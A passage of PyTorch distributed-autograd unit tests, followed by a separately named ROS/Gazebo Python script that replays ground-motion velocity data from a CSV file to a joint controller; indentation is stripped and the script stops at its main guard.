t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 is done in the store, since the RPC framework on
# some nodes might be broken at this point (listenLoop() in
# ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
# only have `num_current_backward_passes` and `num_autograd contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
class CudaDistAutogradTest(CommonDistAutogradTest):
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class WrapperModule(nn.Module):
def __init__(self, model, device):
super().__init__()
self.model = model.to(device)
def forward(self, *args):
return self.model(*args)
def gradients(self, ctx_id):
grads = dist_autograd.get_gradients(ctx_id)
return [grads[p] for p in self.model.parameters()]
class TensorPipeCudaDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeCudaDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeCudaDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_gradients_synchronizations(self):
options = self.rpc_backend_options
for peer_rank in range(self.world_size):
options.set_device_map(worker_name(peer_rank), {self.rank: peer_rank})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# this is master
layers = [nn.Linear(2000, 2000) for _ in range(self.world_size - 1)]
local_layers = [l.to(0) for l in layers]
remote_layers = []
for rank in range(1, self.world_size):
remote_layers.append(rpc.remote(
worker_name(rank),
WrapperModule,
args=(layers[rank - 1], rank)
))
x = torch.randn(5000, 2000).to(0)
# local iteration
local_model = nn.Sequential(*local_layers)
local_model(x).sum().backward()
# remote iteration
with dist_autograd.context() as context_id:
for remote_layer in remote_layers:
x = remote_layer.rpc_sync().forward(x)
dist_autograd.backward(context_id, [x.sum()])
futs = []
for remote_layer in remote_layers:
futs.append(remote_layer.rpc_async().gradients(context_id))
for i in range(len(futs)):
local_gradients = [p.grad for p in local_layers[i].parameters()]
for g1, g2 in zip(futs[i].wait(), local_gradients):
self.assertEqual(g1, g2)
rpc.shutdown()
|
motion_from_file.py
|
#! /usr/bin/env python
from __future__ import print_function
import rospy
from std_msgs.msg import Float64
from sensor_msgs.msg import JointState
import actionlib
import pbr_gazebo.msg
from threading import Thread
from collections import deque
import numpy as np
import rospkg
import os
import csv
from gazebo_msgs.msg import LinkStates
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Twist
class MotionFromFile(object):
def __init__(self, file_name, link_name='double_rock::box'):
self.link_name = link_name
rospack = rospkg.RosPack()
rospack.list()
pkg_path = rospack.get_path('pbr_gazebo')
self.file_name = os.path.join(pkg_path, 'src/ground_motion_data', file_name)
times = []
self.vel_commands = []
with open(self.file_name, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
t = float(row['time'])
a = float(row['filtered_acc'])
v = float(row['filtered_velocity'])
d = float(row['displacement'])
times.append(t)
self.vel_commands.append(v)
self.times = []
for i in range(len(times) - 1):
self.times.append(times[i+1] - times[i])
# joint state subscriber
rospy.Subscriber('/gazebo/link_states', LinkStates, self.LinkStatecallback)
self.default_vel = 0.0
self.x = 0
rospy.Subscriber("/prismatic_box_controller/joint_states", JointState, self.jointstate_cb)
self.double_rock_twist_pub = rospy.Publisher('/motion_from_file/double_rock/twist', Twist, queue_size=10)
self.double_rock_pose_pub = rospy.Publisher('/motion_from_file/double_rock/pose', Pose, queue_size=10)
# velocity controller
self.Hz = 1000
self.vel_pub = rospy.Publisher('/prismatic_box_controller/prismatic_joint_controller/command', Float64,
queue_size=10)
self.vel_command = self.default_vel
self.vel_thread = Thread(target=self.send_vel, args=())
self.vel_thread.daemon = True
self.vel_thread.start()
# pulse motion action server
self._feedback = pbr_gazebo.msg.AFFeedback()
self._result = pbr_gazebo.msg.AFResult()
self._as = actionlib.SimpleActionServer('ground_motion_server', pbr_gazebo.msg.AFAction, execute_cb=self.execute_cb, auto_start=False)
self._as.start()
rospy.loginfo("pulse_motion_planner/ground_motion_server" + " has been initialized!")
def execute_cb(self, goal):
A = goal.A
F = goal.F
rate = rospy.Rate(self.Hz) # Hz
if A*F == 0:
# reset
err = - self.x
errs = deque(maxlen=5)
errs.append(0)
P = 1
I = 0.2
while abs(err)>0.001:
self.vel_command = P*err + I*np.array(errs).mean()
rate.sleep()
err = - self.x
errs.append(err)
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('reset completed')
else:
step_nm = len(self.times)
print(step_nm)
for j in range(step_nm):
self.vel_command = self.vel_commands[j]
rospy.sleep(self.times[j])
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('ground motion completed')
def jointstate_cb(self, data):
# this is from the ros_controller. It's not ground truth
self.x = data.position[0]
def LinkStatecallback(self, data):
idx = data.name.index(self.link_name)
double_rock_pose = data.pose[idx]
double_rock_twist = data.twist[idx]
self.double_rock_twist_pub.publish(double_rock_twist)
self.double_rock_pose_pub.publish(double_rock_pose)
def send_vel(self):
rate = rospy.Rate(self.Hz) # Hz
while not rospy.is_shutdown():
self.vel_pub.publish(self.vel_command)
rate.sleep()
if __name__ == '__main__':
